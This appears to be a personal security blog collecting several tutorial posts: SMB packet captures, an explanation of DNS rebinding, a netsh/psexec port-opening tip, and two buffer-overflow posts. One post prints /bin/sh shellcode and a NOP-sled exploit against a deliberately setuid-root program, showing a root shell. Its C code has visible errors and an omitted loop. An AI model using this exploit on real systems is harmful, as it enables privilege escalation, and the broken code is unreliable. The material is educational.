No system is an island - Using Windows And Tech Step By Step

We connect to different windows boxes or linux boxes for file sharing on a network without actually bothering what makes it happen.Well,Server Message Block does exactly that.It's job is to be a client server, request-response protocol.

Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX. Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.

http://www.samba.org/cifs/docs/what-is-smb.html is a good reference to what SMB is all about.

Personally,I wanted to see what happens when I access any other windows box using the UNC path (\\server\share).So,I used the following scenario :

192.168.52.1 wants to talk(share/access files) on 192.168.52.3

Here's what actually happened courtesy Ethereal dumps :

SMB Request :
0000 00 0c 29 58 26 61 00 50 56 c0 00 01 08 00 45 00 ..)X&a.P V.....E.
0010 00 b1 b6 88 40 00 80 06 5a 69 c0 a8 34 01 c0 a8 ....@... Zi..4...
0020 34 03 08 cc 01 bd 62 96 34 2a 7a cf e7 e7 50 18 4.....b. 4*z...P.
0030 ff ff f9 b6 00 00 00 00 00 85 ff 53 4d 42 72 00 ........ ...SMBr.
0040 00 00 00 18 53 c8 00 00 00 00 00 00 00 00 00 00 ....S... ........
0050 00 00 00 00 ff fe 00 00 00 00 00 62 00 02 50 43 ........ ...b..PC
0060 20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d NETWORK PROGRAM
0070 20 31 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30 00 1.0..LA NMAN1.0.
0080 02 57 69 6e 64 6f 77 73 20 66 6f 72 20 57 6f 72 .Windows for Wor
0090 6b 67 72 6f 75 70 73 20 33 2e 31 61 00 02 4c 4d kgroups 3.1a..LM
00a0 31 2e 32 58 30 30 32 00 02 4c 41 4e 4d 41 4e 32 1.2X002. .LANMAN2
00b0 2e 31 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 .1..NT L M 0.12.


SMB Response :
0000 00 50 56 c0 00 01 00 0c 29 58 26 61 08 00 45 00 .PV..... )X&a..E.
0010 00 81 00 4d 40 00 80 06 10 d5 c0 a8 34 03 c0 a8 ...M@... ....4...
0020 34 01 01 bd 08 cc 7a cf e7 e7 62 96 34 b3 50 18 4.....z. ..b.4.P.
0030 fa 67 4d 16 00 00 00 00 00 55 ff 53 4d 42 72 00 .gM..... .U.SMBr.
0040 00 00 00 98 53 c8 00 00 00 00 00 00 00 00 00 00 ....S... ........
0050 00 00 00 00 ff fe 00 00 00 00 11 05 00 03 0a 00 ........ ........
0060 01 00 04 11 00 00 00 00 01 00 00 00 00 00 fd e3 ........ ........
0070 00 80 e0 49 1f cb 33 df c7 01 a4 01 00 10 00 c4 ...I..3. ........
0080 80 db 7b 34 95 9e 45 9f 3a 4f 64 44 e0 a0 51 ..{4..E. :OdD..Q

One thing which is very clear is that Microsoft implementation of SMB uses LANMAN (2.1 in this case).
The figure shows the packets flowing back and forth both the boxes,we can see NetBIOS headers along with the SMB headers and payloads.
Certainly makes some sense now.

Recently,I came across an article which revisited the concept of rebinding DNS queries,the methodology for the same was explained in a whitepaper from 1996 by Stanford students.

The way DNS rebinding attacks work is somewhat interesting.
Lets say I am logged onto my client box(aka victim) surfing the web.I come across an online ad whih serves active content like Flash and java scripts.
To perform a DNS rebinding attack, bad guy answers DNS queries for their own domain with the IP address of their server but a very short time-to-live (TTL). Using javascript, or some other mechanism, the attacker initiates a second request to their domain from the victim’s machine. Since the TTL has expired, another DNS query is sent to the attacker’s DNS server. This time, the server responds with the IP address of a target server that the attacker wishes to connect to (e.g., an internal web server).
The beauty here is firewalls are fooled in allowing this as it is a legitimate request and open up the machines on the corporate LAN to the bad outside world.

To avoid this,browsers do have an in-built mechanism called pinning which will associate DNS entries to their respective IP addresses for a foxed time period(30 mins for Internet Explorer and 30-120 seconds for Mozilla Firefox).
Folks at Stanford carried out a demonstration wherein they setup an attacker that changed the IP addresses from its own to an internal machine which was accepted by the victim boxes and after a span of 3 days or so,these guys were able to obtain about 100.3 machine days of network access.
The dangerous thing about DNS rebinding is that users dont have to click on the malicious links,all they need to do is view the ad/webpage which will initiate the attack.
Hope this was an interesting post,will try to do this sometime in my lab just to see how it goes.

Peace.

In the previous post,we checked out the brief overview of buffer overflow.
Lets actually try it out making the program go where we want and execute code that can be used to gain root.
The difficult part here is to actually find out where the program should jump during execution,any wrong address and it will simply crash and burn.
Bytecode injection - a fancy term used to make a buffer overflow actually work is described here.

Lets take a sample code for vulnerability,similar to that in my previous post :

int main(int argc,char *argv[])
{
char buffer[500];
strcpy(buffer,argv[1]; //Simply copying something addressed by argv into buffer
return 0;
}

apache@apache:~/Desktop$ gcc -o vuln vuln.c
apache@apache:~/Desktop$./vuln.c test

It does nothing as of now except screwing up memory allocation on the box.To make it truly dangerous,we need to give it executable rights and changing ownership to root and turn the suid on.

apache@apache:~/Desktop$ sudo chown root vuln
apache@apache:~/Desktop$ sudo chmod +s vuln
apache@apache:~/Desktop$ ls -l vuln
-rwsr-sr-x 1 root users

This makes it vulnerable to buffer overflow.Now we need a specially made buffer which can be fed to this.This buffer will have the shellcode that will overwrite return address in stack so that we can run shellcode.First four bytes where the return address is stored must be overwritten by shellcode which makes it somewhat daunting.If we use NOP instruction(which basically does nothing but wastes CPU cycles,we can get the relative address by subtracting the offset from the stack pointer).Basically,when NOP is encountered by stack pointer,it will move to the next location and so on.If we fill our wonderful buffer at the start with NOP and the end with the relative addresses of shellcode,we can run the code.

For your viewing pleasure :

|NOP bunch | Shellcode|Repeated return address|

Lets assume that the offset is 0,so the relative address is the stack pointer value.
Code for shellcode exploit as follows ,I have put it as exploit.c :

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

unsigned long sp(void)
{
{_asm_("mov1 %esp,%eax");} //Stack pointer is returned

int main(int argc,char *argv[])
{
int i,offset;
long esp,ret,*addr_ptr;
char *buffer,*ptr;
offset = 0;
esp = sp(); //current stack pointer goes in esp
ret = esp - offset ; //obviously
printf("Stack pointer (ESP) : 0x%x\n",esp);
printf("Offset from ESP : 0x%x\n",offset);
printf("Return address : 0x%x\n",ret);

buffer=malloc(600); //giving 600 bytes for buffer

//Now we fill the buffer with desired return address
ptr=buffer;
addr_ptr=(long *) ptr;
for(i=0;i<600;i+=4) // four because of stack pointer increasing by four bytes
{ *(addr_ptr++)=ret; }

for(i=0;i<200;i++) //Loop to fill first 200 bytes of buffer with NOP
{ buffer[i] ='\x90'; }

//Put the shellcode in between

ptr = buffer + 200;
loop for reading shellcode
{
Code omitted for brevity
}

Now to actually see if this works :

apache@apache:~/Desktop$ gcc -o exploit exploit.c
apache@apache:~/Desktop$ ./exploit

Output:
Stack pointer (ESP) : 0xbffff978
Offset from ESP:0x0
Desired return address:0xbffff978

Before the code:
apache@apache:~/Desktop$whoami
apache

After the code:
root@apache#whoami
root

Might seem complex at first,but if we think for a while...it does make sense.
Life is funny isn't it?
Enough of buffer overflow,my next post will be something interesting and vibrant.

Buffer overflow is a very common and effective exploit to gain privileged access to a system.In brief,what this means is making any program to do something which it has no clue like making it execute some random instruction which has code to make it crash or exploit it to compromise privileges.
For example,lets say we want to carry out a buffer overflow where we try to fill in the array to a capacity more than what it is supposed to hold.Say,like cramming an array with 128 bytes when it is supposed to have only 20 bytes.
The following C program illustrates the example :



void buffer_overflow(char *s)
{
char buffer[20]; /* Define an array of 20 bytes size */
strcpy(buffer,*s); // Copy whatever is at memory location referenced by string pointer
}

int main()
{
char big_buffer[128]; //Define an array of size 128 bytes
int i;
for (i=0;i<128;i++)
{
big_buffer[i]='A'; // Write all A's in the array
}
buffer_overflow(big_buffer);
exit (0);
}

On executing the code :

apache@apache:~/Desktop$ gcc -o overflow overflow.c
apache@apache:~/Desktop$./overflow.c
apache@apache:~/Desktop$Segmentation fault

Once the program is executed,it will cram the 20 byte array with 128 byte value(all A's).This will result in the excess 108 bytes to erase the values of stack pointer and return value and overwrite them with As(0x41 in hexadecimal).So the code will try to jump to 0x41414141 which is something random and garbage in the program space thereby causing the program to crash.

Suppose,we make the program go to some defined value which has some code to execute that can gain privileged access to the box,this is what buffer overflow exploits do.They can spawn a root shell,make the box go crazy and other 'n' number of things.

Hope this brings some clarity on the art of buffer overflow.

Many a times system admins need to open a port remotely to make an application run remotely on a box .If there is a centralised network management tool,it certainly makes life easy to do that but what if say I dont have anything to do it?
There are many many tools available that are free and do the trick,my personal favorite is the inbuilt windows WMI functionality that can be leveraged along with PsTools which is free too.

Say,I want to open a port like 5900 TCP (yup VNC viewing) on a XP box named AVP-XP without logging into that box interactively.

Two things we need to do :
1.Connect to the remote box somehow.
2.Make changes in the windows firewall settings to add that port remote.

I make a batch file that will use netshell functionality in windows(which is very powerful for network related tasks) :

netsh firewall add portopening protocol=tcp port=5900 name=VNC

I will save it as addport.batNow,to execute this batch file on the remote box where we need to open the port:

The following I do from my system using PsTools utility named psexec which executes processes remotely :

C:\>psexec \\AVP-XP -c "c:\addport.bat" -u domain\username

It will accept the source path and user credentials to start the process on remote system.As it is obvious,you need some sort of administrator privileges (domain admin in case of a domain environment).
The same batch file can be wrapped in other scripts to execute it on a bunch of systems in one go which I will try and do some day.
I hope this has been a useful read which explains only a miniscule part of the power of netshell and remote network administration.